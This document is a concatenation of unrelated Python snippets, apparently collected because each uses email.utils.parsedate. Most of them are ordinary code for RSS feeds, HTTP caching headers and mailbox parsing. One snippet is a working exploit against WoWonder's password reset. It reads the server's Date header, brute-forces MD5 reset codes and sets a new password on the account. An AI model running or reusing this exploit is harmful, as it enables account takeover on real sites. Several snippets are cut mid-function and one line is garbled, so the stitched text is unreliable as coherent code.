def fetch_house_committee_meetings(committees, options): # Load any existing meetings file so we can recycle any GUIDs. existing_meetings = [] output_file = output_for("house") if os.path.exists(output_file): existing_meetings = json.load(open(output_file)) opts = dict(options) opts["binary"] = True opts["force"] = True meetings = [] seen_meetings = set() # Scrape the committee listing page for a list of committees with scrapable events. committee_html = utils.download( "http://docs.house.gov/Committee/Committees.aspx", "committee_schedule/house_overview.html", options) for cmte in re.findall(r'<option value="(....)">', committee_html): if cmte not in committees: logging.error("Invalid committee code: " + cmte) continue # Download the feed for this committee. logging.info("Fetching events for committee " + cmte) html = utils.download( "http://docs.house.gov/Committee/RSS.ashx?Code=%s" % cmte, "committee_schedule/house_%s.xml" % cmte, opts) # It's not really valid? html = html.replace( " ", " " ) # who likes nbsp's? convert to spaces. but otherwise, entity is not recognized. #print html # Parse and loop through the meetings listed in the committee feed. dom = lxml.etree.fromstring(html) # original start to loop for mtg in dom.xpath("channel/item"): eventurl = unicode(mtg.xpath("string(link)")) event_id = re.search(r"EventID=(\d+)$", eventurl) if not event_id: continue # weird empty event showed up event_id = event_id.group(1) pubDate = datetime.datetime.fromtimestamp( mktime(parsedate(mtg.xpath("string(pubDate)")))) # skip old records of meetings, some of which just give error pages if pubDate < (datetime.datetime.now() - datetime.timedelta(days=60)): continue # Events can appear in multiple committee feeds if it is a joint meeting. if event_id in seen_meetings: logging.info("Duplicated multi-committee event: " + event_id) continue seen_meetings.add(event_id) # this loads the xml from the page and sends the xml to parse_house_committee_meeting load_xml_from_page(eventurl, options, existing_meetings, committees, event_id, meetings) # if bad zipfile if load_xml_from_page == False: continue print "[house] Found %i meetings." % len(meetings) return meetings
def extract_date(email): date = email.get('Date') return parsedate(date)
def timestamp_from_http_modtime(str_modtime, str_format=format_epoch): t = datetime.datetime(*parsedate(str_modtime)[:6]) s = str(int((t - datetime.datetime(1970,1,1)).total_seconds())) t = datetime.datetime.fromtimestamp(time.mktime(t.timetuple())) f = str_format.replace(format_epoch, s) return t.strftime(f)
def filter_parsedate(val): """Attempts to parse a date according to the rules in RFC 2822""" return datetime.fromtimestamp(mktime(parsedate(val)))
import calendar, time import hashlib, re url = "http://*****:*****@securityforeveryone.com" } #change this email with your registered wowonder email address req = requests.post(url + "requests.php?f=recover", headers=myheaders, data=recoverdata) b = eut.parsedate(req.headers["Date"]) respepoch = calendar.timegm( time.strptime( "{0}-{1}-{2} {3}:{4}:{5}".format(b[0], b[1], b[2], b[3], b[4], b[5]), '%Y-%m-%d %H:%M:%S')) for token in range(111, 1000): str2hash = "{0}{1}".format(token, respepoch) email_code = hashlib.md5(str2hash.encode()).hexdigest() req_reset = requests.get( url + "index.php?link1=reset-password&code=1_{0}".format(email_code)) if len(re.findall("New password", req_reset.text)) == 1: print(email_code) resetdata = {"password": "******", "id": "1_" + email_code} reqtoken = requests.post(url + "requests.php?f=reset_password",
def parse_date(s): if s is None: return datetime.now() return datetime(*parsedate(s)[:6])
def parser(data): items = [] l = [] match = re.compile('<item>(.+?)</item>', re.DOTALL).findall(data) for item in match: thumb = '' plot = '' title = re.compile('<title>(.+?)</title>', re.DOTALL).findall(item)[0] pubDate = re.compile('<pubDate>(.+?)</pubDate>', re.DOTALL).findall(item)[0] description = re.compile('<description>(.+?)</description>', re.DOTALL).findall(item)[0] if '<category>' in item: category = cleanTitle( re.compile('<category>(.+?)</category>', re.DOTALL).findall(item)[-1]) else: category = '' if 'img src="' in description: thumb = re.compile('img src="(.+?)"', re.DOTALL).findall(description)[0] infos = re.compile('<p>(.*?)</p>', re.DOTALL).findall(description) if len(infos) >= 4: d = {} if infos[1] == '' or infos[1].endswith('...') and len( infos[1]) < len(title): plot = title + '\n\n' + infos[2] else: plot = infos[1].replace('\n', '') + '\n\n' + infos[2] link = re.compile('<link>(.+?)</link>', re.DOTALL).findall(item)[0] try: tmp = link.split('/')[4] tmp = tmp.lower() if 'Video-Podcast' in link or tmp.endswith( 'audio') or tmp.endswith('radio'): continue except: pass documentId = link.split('documentId=')[1] if '&' in documentId: documentId = documentId.split('&')[0] split = infos[2].split('|') runtime = 0 for part in split: if 'Min' in part or 'min' in part: runtime = runtimeToInt(part) if runtime: d['duration'] = str(runtime) channel = part[1:] # ugly if runtime > 0: bcastId = link.split('bcastId=')[1] if '&' in bcastId: bcastId = bcastId.split('&')[0] #fanart = bcast2thumb.getThumb(bcastId) # if fanart: # d['fanart'] = fanart # else: # print 'bcastid not in archive '+bcastId # print title d['_name'] = title d['url'] = link.replace('&', '&') #d["epoch"] = int(time.mktime(time.strptime(pubDate, '%D, %d %M %Y %H:%i:%s %O')))# d["_epoch"] = int(time.mktime(parsedate(pubDate))) d["documentId"] = d['url'].split("documentId=")[-1].split( "&")[0] d['_thumb'] = thumb d['_plot'] = plot d['_channel'] = channel d['_type'] = 'video' d['mode'] = 'libArdPlay' l.append(d) return l
def parse_date(str_date): return datetime(*(parsedate(str_date)[:6]))
access_secret, signature_type='query') stream = TwitterStream(auth=auth, secure=True) # iterate over tweets matching this filter text # IMPORTANT! this is not quite the same as a standard twitter search tweet_iter = stream.statuses.filter(track=search_term) pattern = re.compile("%s" % search_term, re.IGNORECASE) for tweet in tweet_iter: # check whether this is a valid tweet if tweet.get('text'): # turn the date string into a date object that python can handle timestamp = parsedate(tweet["created_at"]) # now format this nicely into HH:MM:SS format timetext = strftime("%H:%M:%S", timestamp) # colour our tweet's time, user and text time_colored = colored(timetext, color="white", attrs=["bold"]) user_colored = colored(tweet["user"]["screen_name"], "green") text_colored = tweet["text"] # replace each instance of our search terms with a highlighted version text_colored = pattern.sub(colored(search_term.upper(), "yellow"), text_colored) # add some indenting to each line and wrap the text nicely indent = " " * 11 text_colored = fill(text_colored, 80,
def rfc822_parsedate(v): from email.utils import parsedate return datetime.datetime.fromtimestamp(time.mktime(parsedate(v)))
def parseHttpTime(timeStr): return time.mktime(eut.parsedate(timeStr))
def timerfc2822(s): d = parsedate(s) return "{:04}-{:02}-{:02} {:02}:{:02}:{:02}".format(d[0],d[1],d[2],d[3],d[4],d[5])
def _fetch_archive(name, archive_type): """Fetches a blueprint archive from S3. Args: name (str): The name of the blueprint. archive_type (str): The type or the archive. Can be 'app' or 'kb'. Returns: str: The path of the local archive after it is downloaded. Raises: EnvironmentError: When AWS credentials are not available """ cache_dir = path.get_cached_blueprint_path(name) try: os.makedirs(cache_dir) except (OSError, IOError): # dir already exists -- no worries pass filename = { "app": BLUEPRINT_APP_ARCHIVE, "kb": BLUEPRINT_KB_ARCHIVE }.get(archive_type) local_archive = os.path.join(cache_dir, filename) remote_url = BLUEPRINT_URL.format(mindmeld_url=BLUEPRINTS_URL, blueprint=name, filename=filename) res = requests.head(remote_url) if res.status_code == 401: # authentication error msg = ( "Invalid MindMeld credentials. Cannot download blueprint. Please confirm " "they are correct and try again.") logger.error(msg) raise EnvironmentError(msg) if res.status_code != 200: # Unknown error msg = "Unknown error fetching {} archive from {!r}".format( archive_type, remote_url) logger.warning(msg) raise ValueError("Unknown error fetching archive") remote_modified = datetime.datetime(*parsedate( res.headers.get("last-modified"))[:6], tzinfo=tz.tzutc()) try: local_modified = datetime.datetime.fromtimestamp( os.path.getmtime(local_archive), tz.tzlocal()) except (OSError, IOError): # File doesn't exist, use minimum possible time local_modified = datetime.datetime(datetime.MINYEAR, 1, 1, tzinfo=tz.tzutc()) if remote_modified < local_modified: logger.info("Using cached %r %s archive", name, archive_type) else: logger.info("Fetching %s archive from %r", archive_type, remote_url) res = requests.get(remote_url, stream=True) if res.status_code == 200: with open(local_archive, "wb") as file_pointer: res.raw.decode_content = True shutil.copyfileobj(res.raw, file_pointer) return local_archive
def parse_datetime(string): if settings.USE_TZ: return datetime(*(parsedate(string)[:6]), tzinfo=current_timezone) else: return datetime(*(parsedate(string)[:6]))
def file_not_modified(self, static_file, environ): try: last_requested = environ['HTTP_IF_MODIFIED_SINCE'] except KeyError: return False return parsedate(last_requested) >= static_file.last_modified
async def handle_request(request, exception): start_time = time.time() format = 'html' url = request.path headers = dict() if url.startswith('/http'): url = url[1:] elif url.startswith('/html/http'): url = url[6:] elif url.startswith('/mhtml/http'): format = 'mhtml' url = url[7:] elif url.startswith('/pdf/http'): format = 'pdf' url = url[5:] elif url.startswith('/jpeg/http'): format = 'jpeg' url = url[6:] elif url.startswith('/png/http'): format = 'png' url = url[5:] if request.query_string: url = url + '?' + request.query_string parsed_url = urlparse(url) if not parsed_url.hostname: return response.text('Bad Request', status=400) if ALLOWED_DOMAINS: if parsed_url.hostname not in ALLOWED_DOMAINS: return response.text('Forbiden', status=403) skip_cache = request.method == 'POST' if not skip_cache: try: data = await cache.get(url, format) modified_since = await cache.modified_since(url) or time.time() headers['Last-Modified'] = formatdate(modified_since, usegmt=True) try: if_modified_since = parsedate( request.headers.get('If-Modified-Since')) if_modified_since = time.mktime(if_modified_since) except TypeError: if_modified_since = 0 if modified_since and if_modified_since >= modified_since: logger.info('Got 304 for %s in cache in %dms', url, int((time.time() - start_time) * 1000)) return response.text('', status=304, headers=headers) if data is not None: headers['X-Prerender-Cache'] = 'hit' logger.info('Got 200 for %s in cache in %dms', url, int((time.time() - start_time) * 1000)) if format == 'html': return response.html(apply_filters(data.decode('utf-8'), HTML_FILTERS), headers=headers) return response.raw(data, headers=headers) except Exception: logger.exception('Error reading cache') if sentry: sentry.captureException() if CONCURRENCY <= 0: # Read from cache only logger.warning('Got 502 for %s in %dms, prerender unavailable', url, int((time.time() - start_time) * 1000)) return response.text('Bad Gateway', status=502) try: if _ENABLE_CB: user_agent = request.headers.get('user-agent', '') _os, browser = httpagentparser.simple_detect(user_agent) breaker = _BREAKERS[browser] data, status_code = await breaker.run( lambda: _render(request.app.prerender, url, format)) else: data, status_code = await _render(request.app.prerender, url, format) headers.update({ 'X-Prerender-Cache': 'miss', 'Last-Modified': formatdate(usegmt=True) }) logger.info('Got %d for %s in %dms', status_code, url, int((time.time() - start_time) * 1000)) if format == 'html': if 200 <= status_code < 300: executor.submit(_save_to_cache, url, data.encode('utf-8'), format) return response.html(apply_filters(data, HTML_FILTERS), headers=headers, status=status_code) if 200 <= status_code < 300: executor.submit(_save_to_cache, url, data, format) return response.raw(data, headers=headers, status=status_code) except (asyncio.TimeoutError, asyncio.CancelledError, TemporaryBrowserFailure, RetriesExhausted): logger.warning('Got 504 for %s in %dms', url, int((time.time() - start_time) * 1000)) return response.text('Gateway timeout', status=504) except TooManyResponseError: logger.warning('Too many response error for %s in %dms', url, int((time.time() - start_time) * 1000)) return response.text('Service unavailable', status=503) except CircuitOpen: logger.warning('Circuit breaker open for %s', browser) return response.text('Service unavailable', status=503) except Exception: logger.exception('Internal Server Error for %s in %dms', url, int((time.time() - start_time) * 1000)) if sentry: sentry.captureException() return 
response.text('Internal Server Error', status=500)
t = Path(tmpdir / "KFMon") t.mkdir(parents=True, exist_ok=True) # Start with Plato print("\n* Creating a one-click package for Plato . . .") # It'll be staged in its own directory pl = Path(t / "Plato") # Download both packages... print("* Downloading original package") pl_main = Path(t / "Plato.zip") with requests.get(plato_main_url, stream=True) as r: if r.status_code != 200: raise SystemExit("Couldn't download the latest Plato release!") # We'll restore its mtime later... plato_date = mktime(parsedate(r.headers["Last-Modified"])) clen = int(r.headers.get("Content-Length", 0)) wrote = 0 with pl_main.open(mode="w+b") as f: with tqdm(total=clen, unit='B', unit_scale=True, unit_divisor=1024) as pbar: for data in r.iter_content(chunk_size=DEFAULT_BUFFER_SIZE): written = f.write(data) wrote += written pbar.update(written) if clen != 0 and wrote != clen: raise SystemExit( "Wrote {} bytes to disk instead of the {} expected!".format( wrote, clen)) pl_scripts = Path(t / "Plato-Scripts.zip") with requests.get(plato_scripts_url, stream=True) as r:
def parse_mailbox(mailbox_path, my_name, my_email, timestamp_format, use_mbox): if not use_mbox: mailbox_path = os.path.join(mailbox_path, "") if not os.path.isdir(mailbox_path + 'new'): os.mkdir(mailbox_path + 'new') if not os.path.isdir(mailbox_path + 'tmp'): os.mkdir(mailbox_path + 'tmp') if use_mbox: mbox = mailbox.mbox(mailbox_path) else: mbox = mailbox.Maildir(mailbox_path, None) sorted_mails = sorted(mbox, key=extract_date_mbox) # Sometimes thunderbird will produce mbox files with duplicate messages. # Keep track of all seen Message-ID's to prevent writing out duplicate # lines to the logs. seen_ids = set() for message in sorted_mails: messageobj = [] # Very rarely (happened to me with only 1 message out of 25,000), # Thunderbird/GMail will produce a malformed message with a payload, # but no metadata. Just skip these, but print a warning so the user # can ensure that this is not happening too often. if len(message.keys()) == 0: print("Warning: Skipping malformed message") continue # Skip duplicates if message['Message-ID'] in seen_ids: continue seen_ids.add(message['Message-ID']) name = re.sub("Chat with ", "", message['subject']) payload = message.get_payload() if type(payload) is str: # We're in one of the new hybrid-style single-use messages # Some (but not all) of these messages use quoted-printable # encoding (which uses = as an escape character). # The remainder are encoded with 7bit ASCII, which must not # be decoded, because treating = as an escape causes havoc. if message['Content-Transfer-Encoding'] == 'quoted-printable': payload = quopri.decodestring(payload) payload = payload.decode('utf-8') payload = payload.strip() to_name = re.sub(" <[^>]*>", "", message.get('To')) from_name = re.sub(" <[^>]*>", "", message.get('From')) if not name: name = to_name if to_name != my_name else from_name rawtimestr = message.get('Date') timestamp = time.strftime(timestamp_format, parsedate(rawtimestr)) pars = HTMLParser.HTMLParser() outline = "%s <%s> %s\n" % (timestamp, from_name, pars.unescape(payload)) messageobj.append(outline.encode('utf-8')) else: #We're in an old Google Talk Jabber conversation message payload = payload[0].as_string() # Seemingly all of these messages use quoted-printable encoding, # even though 'Content-Transfer-Encoding' is never set. payload = quopri.decodestring(payload) payload = payload.decode('utf-8') # The emails have a couple of chaff lines before the XML starts payload = re.sub(r'^[^<]*<', "<", payload) chatxml = xml.dom.minidom.parseString(payload.encode('utf-8')) for messagexml in chatxml.getElementsByTagName("cli:message"): speaker = messagexml.getAttribute("from") rawtimestr = messagexml.getElementsByTagName( "time")[0].getAttribute("ms") timefloat = float(rawtimestr[:-3] + "." + rawtimestr[-3:]) timestamp = time.strftime(timestamp_format, time.localtime(timefloat)) try: content = messagexml.getElementsByTagName( "cli:body")[0].firstChild.data except AttributeError: # No 'data' element means that it's an empty message content = "" except IndexError: # No "cli:body" elements means that it's a non-message event, # like a time-gap or user-unavailable message continue outline = "%s <%s> %s\n" % (timestamp, speaker, content) messageobj.append(outline.encode('utf-8')) write_to_file("%s.txt" % filename_sanitize(name)[:250], messageobj)
def run(environ, start_response): # start_response('404 Not Found', [('Content-Type', 'text/html; charset=UTF-8')]) # return [str(environ)] path = environ['PATH_INFO'][1:].split('/') use_gzip = False try: if 'gzip' in environ['HTTP_ACCEPT_ENCODING'].split(','): use_gzip = True except KeyError: pass path0 = path[0] if path0 == '' and environ['PATH_INFO'][0] == '/': path0 = 'index.html' if path0 in arquivos: arquivo = arquivos[path0] if not 'uncompressed_length' in arquivo: fname = path0 fp = open(fname, 'rb') arquivo['uncompressed_data'] = fp.read() fp.close() arquivo['uncompressed_length'] = str(os.path.getsize(fname)) arquivo['last_modified_time'] = os.path.getmtime(fname) arquivo['last_modified_str'] = formatdate( arquivo['last_modified_time'], False, True) try: since_time = calendar.timegm( parsedate(environ['HTTP_IF_MODIFIED_SINCE'])) if arquivo['last_modified_time'] <= since_time: start_response('304 Not Modified', []) return [''] except KeyError: pass content_length = arquivo['uncompressed_length'] content = arquivo['uncompressed_data'] content_encoding = None if use_gzip: if not 'compressed_length' in arquivo: fname = path0 + '.gz' fp = open(fname, 'rb') arquivo['compressed_data'] = fp.read() fp.close() arquivo['compressed_length'] = str(os.path.getsize(fname)) content_length = arquivo['compressed_length'] content = arquivo['compressed_data'] content_encoding = 'gzip' headers = [ ('Content-Type', arquivo['content_type']), # ('Expires', '-1'), ('Last-Modified', arquivo['last_modified_str']), ('X-Uncompressed-Content-Length', arquivo['uncompressed_length']), ('Content-Length', content_length), ] if content_encoding is not None: headers.append(('Content-Encoding', content_encoding)) start_response('200 OK', headers) return [content] elif path0 == 'load2.cgi': fname = encoded_fname(environ) data = None headers = [('Content-Type', 'application/json'), ('Expires', '-1')] try: # os arquivos estão em gzip. se gzip for pedido, o arquivo é # aberto normalmente e não é decodificado if use_gzip: fp = open(dados_prefix + fname + '.gz', 'rb') headers.append(('Content-Encoding', 'gzip')) else: fp = gzip.open(dados_prefix + fname + '.gz', 'rb') data = fp.read() fp.close() except IOError: pass if data is None: data = '' start_response('200 OK', headers) return [data] elif path0 == 'save2.cgi': fname = encoded_fname(environ) data = environ['wsgi.input'].read() fp = gzip.open(dados_prefix + fname + '.gz', 'wb') fp.write(data) fp.close() start_response('200 OK', [('Content-Type', 'text/html'), ('Expires', '-1')]) return ['OK'] elif path0 == 'ping.cgi': content_disposition = 'attachment; filename=' + get_q( environ['QUERY_STRING']) wsgi_input = environ['wsgi.input'].read().split('\r\n') terminator = wsgi_input[0] + '--' data = [] started = False for line in wsgi_input[1:]: if line == terminator: break if started: data.append(line) if line == '': started = True data = '\r\n'.join(data) start_response('200 OK', [('Content-Type', 'application/octet-stream'), ('Content-Disposition', content_disposition), ('Expires', '-1')]) return [data] elif path0 == 'robots.txt': start_response('200 OK', [('Content-Type', 'text/plain')]) data = "User-agent: *\nDisallow: /\n" return [data] raise IOError
def get_time_remaining(self, request): """See if a request is static and how long it can be cached for""" from email.utils import parsedate re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)') is_static = False time_remaining = -1 try: if 'response_headers' in request: content_length = self.get_header_value( request['response_headers'], 'Content-Length') if content_length is not None: content_length = int( re.search(r'\d+', str(content_length)).group()) if content_length == 0: return is_static, time_remaining if 'response_headers' in request: content_type = self.get_header_value( request['response_headers'], 'Content-Type') if content_type is None or \ (content_type.find('/html') == -1 and \ content_type.find('/cache-manifest') == -1): is_static = True cache = self.get_header_value( request['response_headers'], 'Cache-Control') pragma = self.get_header_value( request['response_headers'], 'Pragma') expires = self.get_header_value( request['response_headers'], 'Expires') if cache is not None: cache = cache.lower() if cache.find('no-store') > -1 or cache.find( 'no-cache') > -1: is_static = False if is_static and pragma is not None: pragma = pragma.lower() if pragma.find('no-cache') > -1: is_static = False if is_static: time_remaining = 0 if cache is not None: matches = re.search(re_max_age, cache) if matches: time_remaining = int( matches.groupdict().get('maxage')) age = self.get_header_value( request['response_headers'], 'Age') if time_remaining == 0: is_static = False time_remaining = -1 elif age is not None: time_remaining -= int( re.search( r'\d+', str(age).strip()).group()) elif expires is not None: date = self.get_header_value( request['response_headers'], 'Date') exp = time.mktime(parsedate(expires)) if date is not None: now = time.mktime(parsedate(date)) else: now = time.time() time_remaining = int(exp - now) if time_remaining < 0: is_static = False except Exception: pass return is_static, time_remaining
def http_date_to_datetime(string):
    """
    >>> http_date_to_datetime('Thu, 26 Dec 2013 09:50:10 GMT')
    datetime.datetime(2013, 12, 26, 9, 50, 10)
    """
    return datetime.datetime(*parsedate(string)[:6])

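# Added note: parsedate() discards the timezone offset, so the helper above
# returns a naive datetime in whatever zone the header used (GMT for HTTP dates).
# A sketch of a UTC-normalising variant using parsedate_tz/mktime_tz from the
# same module (the function name is an assumption, not part of the original):
import datetime
from email.utils import parsedate_tz, mktime_tz

def http_date_to_utc_datetime(string):
    """
    >>> http_date_to_utc_datetime('Thu, 26 Dec 2013 09:50:10 GMT')
    datetime.datetime(2013, 12, 26, 9, 50, 10)
    """
    return datetime.datetime.utcfromtimestamp(mktime_tz(parsedate_tz(string)))
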
def inbound(request):
    """Try to serve a 304 for resources under assets/.
    """
    uri = request.line.uri

    if not uri.startswith('/assets/'):
        # Only apply to the assets/ directory.
        return request

    if version_is_dash(request):
        # Special-case a version of '-' to never 304/404 here.
        return request

    if not version_is_available(request):
        # Don't serve one version of a file as if it were another.
        raise Response(404)

    ims = request.headers.get('If-Modified-Since')
    if not ims:
        # This client doesn't care about when the file was modified.
        return request

    if request.fs.endswith('.spt'):
        # This is a request for a dynamic resource. Perhaps in the future
        # we'll delegate to such resources to compute a sensible Last-Modified
        # or E-Tag, but for now we punt. This is okay, because we expect to
        # put our dynamic assets behind a CDN in production.
        return request

    try:
        ims = timegm(parsedate(ims))
    except:
        # Malformed If-Modified-Since header. Proceed with the request.
        return request

    last_modified = get_last_modified(request.fs)
    if ims < last_modified:
        # The file has been modified since. Serve the whole thing.
        return request

    # Huzzah!
    # =======
    # We can serve a 304! :D
    response = Response(304)
    response.headers['Last-Modified'] = format_date_time(last_modified)
    response.headers['Cache-Control'] = 'no-cache'
    raise response

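# A small, self-contained sketch (added; the function and variable names are
# hypothetical) of the core conditional-GET test used in inbound() above: parse
# If-Modified-Since with timegm(parsedate(...)) and answer 304 only when the
# resource has not been modified since that timestamp.
from calendar import timegm
from email.utils import parsedate

def can_send_304(if_modified_since, last_modified_ts):
    if not if_modified_since:
        # No header: the client has nothing cached, serve the full response.
        return False
    parsed = parsedate(if_modified_since)
    if parsed is None:
        # Malformed header: serve the full response.
        return False
    return timegm(parsed) >= last_modified_ts
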
def parse_datetime(string):
    return datetime(*(parsedate(string)[:6]))

def add_last_modified_headers(self, static_file, url):
    mtime = os.stat(static_file.path).st_mtime
    last_modified = formatdate(mtime, usegmt=True)
    static_file.last_modified = last_modified
    static_file.last_modified_parsed = parsedate(last_modified)
    static_file.headers['Last-Modified'] = last_modified

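# Illustrative round-trip (added, not part of the original): formatdate(mtime,
# usegmt=True) emits an RFC 1123 date in GMT, and parsedate() recovers the same
# moment at one-second precision, which is what the parsed value above can be
# compared against. The helper name is an assumption.
import os
import time
from email.utils import formatdate, parsedate

def last_modified_roundtrip(path):
    mtime = os.stat(path).st_mtime
    header = formatdate(mtime, usegmt=True)   # e.g. 'Thu, 26 Dec 2013 09:50:10 GMT'
    assert parsedate(header)[:6] == tuple(time.gmtime(mtime))[:6]
    return header
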
def get_date(msg):
    if msg is not None:
        email_date = parsedate(msg.get('date'))
        return time.strptime(
            '%s-%s-%s' % (email_date[0], email_date[1], email_date[2]),
            '%Y-%m-%d')

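# A defensive variant (added as a sketch; get_date_safe is not in the original)
# of get_date() above: the Date header may be missing or unparseable, in which
# case parsedate() yields None and the strptime round-trip would raise.
import time
from email.utils import parsedate

def get_date_safe(msg, default=None):
    if msg is None:
        return default
    raw = msg.get('date')
    parsed = parsedate(raw) if raw else None
    if parsed is None:
        return default
    # As in get_date(): a struct_time at midnight on the message's date.
    return time.strptime('%s-%s-%s' % (parsed[0], parsed[1], parsed[2]), '%Y-%m-%d')
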
def get(self, urlpart):
    download = self.request.get('download', None) is not None

    # Redirect to usage page for visits from links (obviously not a browser PAC fetcher)
    if MAIN_SERVER and not download and 'Referer' in self.request.headers:
        self.redirect("/usage?u=" + urlpart, permanent=False)
        return

    if not self.parseRequest(urlpart):
        self.error(404)
        return

    rules = RuleList.getList('gfwlist')
    if rules is None:
        self.error(500)
        return

    pacTime = formatdate(
        timegm(
            max(self.settingTime,
                datetime(*parsedate(rules.date)[:6])).timetuple()),
        False, True)
    self.response.headers['ETag'] = '"' + pacTime.replace(',', '').replace(' ', '') + '"'
    self.lastModified(pacTime)

    # Load balance
    if MAIN_SERVER and len(self.customRules) <= MAX_CUSTOM_RULE_NUMBER_FOR_MIRROR:
        mirror = self.pickMirror()
        if mirror:
            query = ['e=' + urlsafe_b64encode(r) for r in self.customRules]
            if download:
                query.append('download')
            mirror = '%s/%s?%s' % (mirror, self.proxyDict['urlpart'], '&'.join(query))
            logging.debug('Redirect the PAC fetcher to %s', mirror)
            if not DEBUG:
                # A fixed server for a rate-limiting cycle
                self.response.headers['Cache-Control'] = 'public,max-age=%d' % (
                    RATELIMIT_DURATION * 3600)
            self.redirect(mirror, permanent=False)
            return

    if RATELIMIT_ENABLED and self.isRateLimited():
        return

    customJs = autoproxy2pac.rule2js('\n'.join([''] + self.customRules))
    if self.proxyDict['name'] == 'privoxy':
        customJs = privoxyConfCode + customJs

    configs = {
        'proxyString': self.proxyString,
        'defaultString': 'DIRECT',
        'customCodePre': customJs,
    }
    pac = autoproxy2pac.generatePac(rules.toDict(), configs,
                                    autoproxy2pac.defaultPacTemplate)

    import base64
    pac = '''function decode64(_1){var _2="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var _3="";var _4,_5,_6;var _7,_8,_9,_a;var i=0;_1=_1.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{_7=_2.indexOf(_1.charAt(i++));_8=_2.indexOf(_1.charAt(i++));_9=_2.indexOf(_1.charAt(i++));_a=_2.indexOf(_1.charAt(i++));_4=(_7<<2)|(_8>>4);_5=((_8&15)<<4)|(_9>>2);_6=((_9&3)<<6)|_a;_3=_3+String.fromCharCode(_4);if(_9!=64){_3=_3+String.fromCharCode(_5);}if(_a!=64){_3=_3+String.fromCharCode(_6);}}while(i<_1.length);return _3;}eval(decode64("%s"))''' % base64.b64encode(pac)

    self.response.headers['Content-Type'] = 'application/x-ns-proxy-autoconfig'
    if download:
        self.response.headers['Content-Disposition'] = 'attachment; filename="autoproxy.pac"'
    self.response.out.write(pac)

def _parse_date(str):
    if str is None:
        # No date string: fall back to the current time.
        return datetime.now()
    return datetime(*parsedate(str)[:6])

def main():
    fp = open("/tmp/mail.log", "a")
    #fp.write("The file is " + sys.argv[1] + "\n")
    try:
        with open(sys.argv[1], 'rU') as email_fp:
            msg = email.message_from_file(email_fp)
    except Exception as errMess:
        fp.write("Failed to read e-mail message: " + str(errMess) + "\n")
        sys.exit("Failed to read e-mail message")
    raw_date = msg.get('Date', msg.get('Resent-Date', None))
    addr_return_path = msg.get('Return-path', None)
    addr_reply_to = msg.get('Reply-to', None)
    addr_to = msg.get('Envelope-to', None)
    addr_from = msg.get('From', msg.get('Sender', None))
    subject = msg.get('Subject', None)
    fp.write("Message to " + str(addr_to) + "\n")
    #fp.write("From was " + str(addr_from) + "\n")
    #fp.write("Subject was " + str(subject) + "\n")
    to_recipients = list()
    for recipient in getaddresses(msg.get_all('to', []) + msg.get_all('resent-to', [])):
        to_recipients.append(dict(name=recipient[0], address=recipient[1]))
    cc_recipients = list()
    for recipient in getaddresses(msg.get_all('cc', []) + msg.get_all('resent-cc', [])):
        cc_recipients.append(dict(name=recipient[0], address=recipient[1]))
    recipients = list()
    for recipient in getaddresses(msg.get_all('to', []) + msg.get_all('cc', []) +
                                  msg.get_all('resent-to', []) + msg.get_all('resent-cc', [])):
        recipients.append(dict(name=recipient[0], address=recipient[1]))
    if addr_to is None and len(recipients):
        addr_to = recipients[0]['address']
    #fp.write("recipients are " + str(recipients) + "\n")
    if addr_to is not None:
        #fp.write("parsed envelope-to: " + str(parseaddr(addr_to)) + "\n")
        short_code = re.sub(r'@.*', '', parseaddr(addr_to)[1])
    else:
        short_code = None
    #fp.write("short code is " + str(short_code) + "\n")
    record = db.session.query(Shortener).filter_by(short=short_code).first()
    if record is None:
        fp.write("short code not found\n")
        sys.exit("short code not found")
    #fp.write("short code found\n")
    #file_number = get_new_file_number(record.uid, 'email', yaml_file_name=record.filename)
    ##fp.write("file number is " + str(file_number) + "\n")
    #saved_file_email = SavedFile(file_number, fix=True)
    if addr_from is not None:
        #fp.write("parsed from: " + str(parseaddr(addr_from)[1]) + "\n")
        addr_from = dict(name=parseaddr(addr_from)[0], address=parseaddr(addr_from)[1])
    else:
        addr_from = dict(empty=True)
    if addr_return_path is not None:
        #fp.write("parsed return_path: " + str(parseaddr(addr_return_path)[1]) + "\n")
        addr_return_path = dict(name=parseaddr(addr_return_path)[0],
                                address=parseaddr(addr_return_path)[1])
    else:
        addr_return_path = dict(empty=True)
    #fp.write("return_path is " + str(addr_return_path) + "\n")
    if addr_reply_to is not None:
        #fp.write("parsed reply-to: " + str(parseaddr(addr_reply_to)[1]) + "\n")
        addr_reply_to = dict(name=parseaddr(addr_reply_to)[0],
                             address=parseaddr(addr_reply_to)[1])
        #fp.write("reply-to is " + str(addr_reply_to) + "\n")
    else:
        addr_reply_to = dict(empty=True)
        #fp.write("reply-to is " + str(addr_reply_to) + "\n")
    msg_current_time = datetime.datetime.now()
    if raw_date is not None:
        msg_date = datetime.datetime.fromtimestamp(mktime(parsedate(raw_date)))
        #fp.write("msg_date is " + str(msg_date) + "\n")
    else:
        msg_date = msg_current_time
        #fp.write("msg_date set to current time\n")
    headers = list()
    for item in msg.items():
        headers.append([item[0], item[1]])
    #fp.write("headers:\n" + json.dumps(headers) + "\n")
    email_record = Email(short=short_code, to_addr=json.dumps(to_recipients),
                         cc_addr=json.dumps(cc_recipients), from_addr=json.dumps(addr_from),
                         reply_to_addr=json.dumps(addr_reply_to),
                         return_path_addr=json.dumps(addr_return_path), subject=subject,
                         datetime_message=msg_date, datetime_received=msg_current_time)
    db.session.add(email_record)
    db.session.commit()
    save_attachment(record.uid, record.filename, 'headers.json', email_record.id, 0,
                    'application/json', 'json', json.dumps(headers))
    counter = 1
    for part in msg.walk():
        if part.get_content_maintype() == 'multipart':
            continue
        filename = part.get_filename()
        if part.get_content_type() == 'text/plain':
            ext = '.txt'
        else:
            ext = mimetypes.guess_extension(part.get_content_type())
        if not ext:
            ext = '.bin'
        if filename:
            filename = '%03d-%s' % (counter, secure_filename(filename))
        else:
            filename = '%03d-attachment%s' % (counter, ext)
        #fp.write("Filename is " + str(filename) + "\n")
        #fp.write("Content type is " + str(part.get_content_type()) + "\n")
        real_filename = re.sub(r'[0-9][0-9][0-9]-', r'', filename)
        real_ext = re.sub(r'^\.', r'', ext)
        save_attachment(record.uid, record.filename, real_filename, email_record.id, counter,
                        part.get_content_type(), real_ext, part.get_payload(decode=True))
        counter += 1
    fp.close()
    user = None
    if record.user_id is not None:
        user = db.session.query(UserModel).filter_by(id=record.user_id).first()
    if user is None:
        user_info = dict(email=None, the_user_id='t' + str(record.temp_user_id),
                         theid=record.temp_user_id, roles=list())
    else:
